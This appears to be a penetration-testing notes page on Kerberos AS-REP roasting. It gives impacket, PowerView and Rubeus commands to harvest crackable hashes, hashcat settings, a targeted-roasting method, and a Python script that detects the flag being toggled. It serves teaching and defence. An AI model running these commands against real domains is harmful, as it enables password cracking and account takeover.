# AS-REP Roasting

Kerberos pre-authentication is the first step of the AS exchange: the client sends a timestamp encrypted with a key derived from the user's password, and the KDC issues a TGT only if that timestamp decrypts correctly. If pre-authentication is not required for an account, the client can send an AS-REQ that contains nothing more than the username, and the KDC answers with an AS-REP whose encrypted part (the session key and ticket metadata, not the TGT itself, which is encrypted with the krbtgt key) is encrypted with the key derived from that user's password. An attacker can therefore request an AS-REP for any such account without knowing its password, take the encrypted part offline and brute-force the password against it; for RC4-HMAC (etype 23) that key is simply the NT hash of the password, which makes cracking cheap.\
Pre-authentication is required by default: the "Do not require Kerberos preauthentication" option (the `DONT_REQ_PREAUTH` bit, `0x400000`, of `userAccountControl`) has to be set explicitly on an account, but it is not unusual to find accounts where it has been enabled, typically for legacy applications or service accounts.

## Attack

{% tabs %}
{% tab title="Remotely" %}
**Linux**

[impacket-GetNPUsers](https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py) lists the accounts that have "Do not require Kerberos pre-authentication" set and requests an AS-REP for each of them.\
With the credentials of any domain user the script can query LDAP for those accounts itself. Without credentials you have to supply a list of candidate usernames (`-no-pass -usersfile`): the KDC then reveals which of them are both valid and roastable, since it only answers a pre-authentication-less AS-REQ for accounts that have the flag set.

{% code overflow="wrap" %}

```bash
# Authenticated: enumerate roastable accounts over LDAP and request their AS-REPs
GetNPUsers.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# Same, but write the hashes to a file in hashcat format (the default; -format john is also available)
GetNPUsers.py -dc-ip <IP_DC> -request -outputfile <OutputFile> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# Unauthenticated: try a list of candidate usernames; only roastable accounts return a hash
GetNPUsers.py -dc-ip <IP_DC> -no-pass -usersfile valid_ad_users.txt <DOMAIN>/
```

{% endcode %}

Crack `<OutputFile>` offline with hashcat, mode `18200` (Kerberos 5 AS-REP, etype 23). That mode only fits RC4-HMAC lines (`$krb5asrep$23$...`); if the KDC answered with an AES etype (17 or 18), the corresponding AES AS-REP modes are needed instead.
{% endtab %}

{% tab title="Locally" %}
**Windows**

Since we are already on a domain-joined Windows host running as a domain user, the tools can use the current security context, so there is no need to specify a username and password.

With [PowerView](/rednote/pentesting-process/active-directory/enumeration.md#powerview) you can see accounts with no pre-authentication required.

{% code overflow="wrap" %}

```powershell
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```

{% endcode %}

We can use [Rubeus](https://github.com/GhostPack/Rubeus) to perform the AS-REP Roasting attack against every roastable account it finds via LDAP.

{% code overflow="wrap" %}

```powershell
# Roast all accounts with DONT_REQ_PREAUTH set; /nowrap prints each hash on a single line
.\Rubeus.exe asreproast /nowrap
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Same, written in hashcat format to a file
.\Rubeus.exe asreproast /format:hashcat /outfile:<OutputFile>
```

{% endcode %}

Crack `<OutputFile>` offline with hashcat, mode `18200` (Kerberos 5 AS-REP, etype 23); as with the Linux output, AES (etype 17/18) hash lines require the corresponding AES AS-REP modes.
{% endtab %}
{% endtabs %}

## Targeted AS-REP Roasting

If an attacker has `GenericWrite` or `GenericAll` (or any right that allows writing `userAccountControl`) over an account, they can set the "Do not require Kerberos pre-authentication" flag on it, request an AS-REP for that account and crack it offline to recover the password, then clear the flag again so the account's `userAccountControl` returns to its original value. From the defender's side both steps are visible: the attribute change is logged on the DC as event 4738 (a user account was changed), and the roast itself shows up as event 4768 with Pre-Authentication Type 0 and, if RC4 was requested, ticket encryption type 0x17.
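As an added example (my own code, not from this page, PowerView or Impacket), the following Python models the flag these tools look for and the attacker's enable/roast/disable sequence, together with a simple detection over a constructed change log: the `userAccountControl` bit `0x400000`, the LDAP filter with the bitwise-AND matching rule that authenticated enumeration uses, and a check for the flag being switched on and back off on the same account within a short window. The account names, attribute values and timestamps are constructed.

```python
from datetime import datetime, timedelta

# userAccountControl bits used here (MS-ADTS); 0x400000 is "Do not require Kerberos preauthentication".
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000

# LDAP filter that returns every account with the flag set; 1.2.840.113556.1.4.803 is the
# bitwise-AND matching rule, so the filter tests the single bit rather than an exact value.
ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)


def preauth_not_required(uac: int) -> bool:
    return bool(uac & DONT_REQ_PREAUTH)


def find_roastable(entries) -> list:
    """Accounts worth roasting: flag set and account not disabled (disabled ones get no AS-REP)."""
    return sorted(
        e["sAMAccountName"] for e in entries
        if preauth_not_required(e["userAccountControl"])
        and not e["userAccountControl"] & ACCOUNTDISABLE
    )


def enable_preauth_not_required(uac: int) -> int:
    """What the attacker writes with GenericWrite/GenericAll before roasting."""
    return uac | DONT_REQ_PREAUTH


def disable_preauth_not_required(uac: int) -> int:
    """The cleanup write; for a targeted roast this returns the original value."""
    return uac & ~DONT_REQ_PREAUTH


def targeted_roast_pattern(changes, window: timedelta = timedelta(minutes=30)) -> list:
    """Detection: the flag goes 0 -> 1 and back 1 -> 0 on the same account within `window`.

    `changes` are (timestamp, account, old_uac, new_uac) tuples, e.g. from directory change
    auditing; a flag that is enabled and simply left on is not reported by this rule.
    """
    enabled_at = {}
    hits = []
    for ts, account, old, new in sorted(changes):
        was, now = preauth_not_required(old), preauth_not_required(new)
        if not was and now:
            enabled_at[account] = ts
        elif was and not now and account in enabled_at:
            if ts - enabled_at.pop(account) <= window:
                hits.append(account)
    return hits


# Constructed directory snapshot and change log.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x410200},          # flag set, enabled
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202},          # flag set, but disabled
]
SAMPLE_CHANGES = [
    (datetime(2024, 5, 2, 9, 0), "svc_legacy", 0x10200, 0x410200),   # enabled and left on
    (datetime(2024, 5, 3, 22, 14), "jdoe", 0x200, 0x400200),         # attacker enables ...
    (datetime(2024, 5, 3, 22, 26), "jdoe", 0x400200, 0x200),         # ... and clears it 12 minutes later
    (datetime(2024, 5, 4, 10, 0), "app01", 0x200, 0x400200),         # admin enables ...
    (datetime(2024, 5, 7, 10, 0), "app01", 0x400200, 0x200),         # ... and clears it three days later
]

if __name__ == "__main__":
    print("filter:", ROASTABLE_FILTER)
    print("roastable:", find_roastable(SAMPLE_ENTRIES))
    print("targeted roast suspects:", targeted_roast_pattern(SAMPLE_CHANGES))
```

The window is deliberately short: the attacker wants the flag on only for as long as it takes to fetch one AS-REP, so a legitimate change that stays in place for days does not match, while the enable/disable pair on `jdoe` does.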
